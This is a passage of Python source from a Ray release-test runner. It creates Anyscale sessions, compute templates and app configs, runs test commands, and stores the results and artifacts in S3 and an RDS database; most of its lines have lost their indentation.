"Process timed out while running a command.")
elif timeout_type == "file_sync":
raise FileSyncTimeoutError(
"Process timed out while syncing files.")
elif timeout_type == "session":
raise SessionTimeoutError(
"Process timed out while starting a session.")
else:
assert False, "Unexpected timeout type."
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
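# Example (editor's addition): _deep_update merges nested mappings in
# place, and _dict_hash produces a stable content hash -- this pair is
# what lets compute templates and app configs be deduplicated by name
# further below.
#
#   base = {"cluster": {"cpus": 4, "region": "us-west-2"}}
#   _deep_update(base, {"cluster": {"cpus": 8}})
#   # -> {"cluster": {"cpus": 8, "region": "us-west-2"}}
#   len(_dict_hash(base))  # -> 64 (sha256 hex digest)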
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def _wrap_app_config_pip_installs(app_config: Dict[Any, Any]):
"""Wrap pip package install in quotation marks"""
if app_config.get("python", {}).get("pip_packages"):
new_pip_packages = []
for pip_package in app_config["python"]["pip_packages"]:
new_pip_packages.append(f"\"{pip_package}\"")
app_config["python"]["pip_packages"] = new_pip_packages
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def maybe_get_alert_for_result(result_dict: Dict[str, Any]) -> Optional[str]:
# If we get a result dict, check if any alerts should be raised
from alert import SUITE_TO_FN, default_handle_result
logger.info("Checking if results are valid...")
# Copy dict because we modify kwargs here
handle_result_kwargs = result_dict.copy()
handle_result_kwargs["created_on"] = None
test_suite = handle_result_kwargs.get("test_suite", None)
handle_fn = SUITE_TO_FN.get(test_suite, None)
if not handle_fn:
logger.warning(f"No handle for suite {test_suite}")
alert = default_handle_result(**handle_result_kwargs)
else:
alert = handle_fn(**handle_result_kwargs)
return alert
def report_result(test_suite: str, test_name: str, status: str, last_logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
parameters = [{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
}, {
"name": "test_suite",
"value": {
"stringValue": test_suite
}
}, {
"name": "test_name",
"value": {
"stringValue": test_name
}
}, {
"name": "status",
"value": {
"stringValue": status
}
}, {
"name": "last_logs",
"value": {
"stringValue": last_logs
}
}, {
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
}, {
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
}, {
"name": "category",
"value": {
"stringValue": category
}
}]
# Default boto3 call timeout is 45 seconds.
retry_delay_s = 64
MAX_RDS_RETRY = 3
exponential_backoff_retry(
lambda: rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=parameters,
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql),
retry_exceptions=rds_data_client.exceptions.StatementTimeoutException,
initial_retry_delay_s=retry_delay_s,
max_retries=MAX_RDS_RETRY)
logger.info("Result has been persisted to the databse")
def log_results_and_artifacts(result: Dict):
results = result.get("results", {})
if results:
msg = "Observed the following results:\n\n"
for key, val in results.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any results."
logger.info(msg)
artifacts = result.get("artifacts", {})
if artifacts:
msg = "Saved the following artifacts:\n\n"
for key, val in artifacts.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any artifacts."
logger.info(msg)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.terminate_session(
session_id=session_id, terminate_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def find_cloud_by_name(sdk: AnyscaleSDK, cloud_name: str,
_repeat: bool = True) -> Optional[str]:
cloud_id = None
logger.info(f"Looking up cloud with name `{cloud_name}`. ")
paging_token = None
while not cloud_id:
result = sdk.search_clouds(
clouds_query=dict(
paging=dict(count=50, paging_token=paging_token)))
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == cloud_name:
cloud_id = res.id
logger.info(
f"Found cloud with name `{cloud_name}` as `{cloud_id}`")
break
if not paging_token or cloud_id or not len(result.results):
break
return cloud_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Tests uses compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create compute "
f"template: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create app "
f"config: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
def run_bash_script(local_dir: str, bash_script: str):
previous_dir = os.getcwd()
bash_script_local_dir = os.path.dirname(bash_script)
file_name = os.path.basename(bash_script)
full_local_dir = os.path.join(local_dir, bash_script_local_dir)
    os.chdir(full_local_dir)
    try:
        subprocess.run("./" + file_name, shell=True, check=True)
    finally:
        # Restore the working directory even if the script fails.
        os.chdir(previous_dir)
def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_15_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise AppConfigBuildFailure("App config build failed.")
if not build_id:
raise AppConfigBuildFailure("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise AppConfigBuildFailure(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise AppConfigBuildFailure(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
            job_name: str, min_workers: int, script: str,
script_args: List[str], env_vars: Dict[str, str],
autosuspend: int) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?autosuspend={autosuspend}"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
# Sleep 1 sec before next check.
time.sleep(1)
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
_check_stop(stop_event, "session")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN") -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
return scd_id, result
def wait_for_session_command_to_complete(create_session_command_result,
sdk: AnyscaleSDK,
scd_id: str,
stop_event: multiprocessing.Event,
state_str: str = "CMD_RUN"):
result = create_session_command_result
completed = result.result.finished_at is not None
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
# Sleep 1 sec before next check.
time.sleep(1)
result = exponential_backoff_retry(
lambda: sdk.get_session_command(session_command_id=scd_id),
retry_exceptions=Exception,
initial_retry_delay_s=10,
max_retries=3)
        completed = result.result.finished_at is not None
if state_str == "CMD_RUN":
_check_stop(stop_event, "command")
elif state_str == "CMD_PREPARE":
_check_stop(stop_event, "prepare_command")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
status_code = result.result.status_code
runtime = time.time() - start_wait
if status_code != 0:
if state_str == "CMD_RUN":
raise RuntimeError(
f"Command returned non-success status: {status_code}")
elif state_str == "CMD_PREPARE":
raise PrepareCommandRuntimeError(
f"Prepare command returned non-success status: {status_code}")
return status_code, runtime
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = exponential_backoff_retry(
lambda: session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0),
retry_exceptions=Exception,
initial_retry_delay_s=10,
max_retries=3)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str]):
if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found sessions {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
        paging_token = result.metadata.next_paging_token
        if not paging_token:
return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
            if not completed:
                return cmd.id, None
        if not paging_token:
            break
    return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
commit_url: str,
        session_name: Optional[str] = None,
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
keep_results_dir: bool = False,
app_config_id_override: Optional[str] = None,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
if not session_name:
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
cloud_id = test_config["cluster"].get("cloud_id", None)
cloud_name = test_config["cluster"].get("cloud_name", None)
if cloud_id and cloud_name:
raise RuntimeError(
f"You can't supply both a `cloud_name` ({cloud_name}) and a "
f"`cloud_id` ({cloud_id}) in the test cluster configuration. "
f"Please provide only one.")
elif cloud_name and not cloud_id:
cloud_id = find_cloud_by_name(sdk, cloud_name)
if not cloud_id:
raise RuntimeError(
f"Couldn't find cloud with name `{cloud_name}`.")
else:
cloud_id = cloud_id or GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"]
# Overwrite global config so that `_load_config` sets the correct cloud
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"] = cloud_id
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
build_id_override = None
if test_config["run"].get("use_connect"):
autosuspend_mins = test_config["run"].get("autosuspend_mins", 5)
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
if app_config_id_override is not None:
logger.info(
"Using connect and an app config override, waiting until "
"build finishes so we can fetch the app config in order to "
"install its pip packages locally.")
build_id_override = wait_for_build_or_raise(
sdk, app_config_id_override)
response = sdk.get_cluster_environment_build(build_id_override)
app_config = response.result.config_json
install_app_config_packages(app_config)
install_matching_ray()
elif "autosuspend_mins" in test_config["run"]:
raise ValueError(
"'autosuspend_mins' is only supported if 'use_connect' is True.")
# Only wrap pip packages after we installed the app config packages
_wrap_app_config_pip_installs(app_config)
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
                                  results: Optional[Dict] = None,
                                  runtime: Optional[int] = None,
                                  commit_url: Optional[str] = None,
                                  session_url: Optional[str] = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
# Add these metadata here to avoid changing SQL schema.
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
            results = get_local_json_content(local_file=results_json)
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
# These values will be set as the test runs.
session_url = None
runtime = None
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
test_uses_ray_connect = test_config["run"].get("use_connect")
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_id = app_config_id_override
app_config_name = None
build_id = build_id_override
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = cloud_id
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
if app_config_id is None:
(
app_config_id,
app_config_name,
) = create_or_find_app_config(sdk, project_id,
app_config)
else:
logger.info(
f"Using override app config {app_config_id}")
app_config_name = sdk.get_app_config(
app_config_id).result.name
if build_id is None:
# We might have already retrieved the build ID when
# installing app config packages locally if using
# connect, so only get the build ID if it's not set.
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
# Start session
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
prepare_command = test_config["run"].get("prepare")
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
if prepare_command or not test_uses_ray_connect:
if test_uses_ray_connect:
logger.info("Found a prepare command, so pushing it "
"to the session.")
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
session_id=session_id)
_check_stop(stop_event, "file_sync")
# Optionally run preparation command
if prepare_command:
logger.info(
f"Running preparation command: {prepare_command}")
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
_, _ = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_PREPARE")
if test_uses_ray_connect:
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
# Build completed, use job timeout
result_queue.put(State("CMD_RUN", time.time(), None))
returncode, logs = run_job(
cluster_name=session_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars,
autosuspend=autosuspend_mins)
_process_finished_client_command(returncode, logs)
return
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN")
if not kick_off_only:
_, runtime = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_RUN")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
runtime=runtime,
session_url=session_url,
commit_url=commit_url)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = logs + "; Command logs:" + get_command_logs(
session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
timeout_type = ""
runtime = None
if isinstance(e, CommandTimeoutError):
timeout_type = "timeout"
runtime = 0
elif (isinstance(e, PrepareCommandTimeoutError)
or isinstance(e, FileSyncTimeoutError)
or isinstance(e, SessionTimeoutError)
or isinstance(e, PrepareCommandRuntimeError)
or isinstance(e, AppConfigBuildFailure)):
timeout_type = "infra_timeout"
runtime = None
elif isinstance(e, RuntimeError):
timeout_type = "runtime_error"
runtime = 0
else:
timeout_type = "unknown timeout"
runtime = None
# Add these metadata here to avoid changing SQL schema.
results = {}
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END", time.time(), {
"status": timeout_type,
"last_logs": logs,
"results": results
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
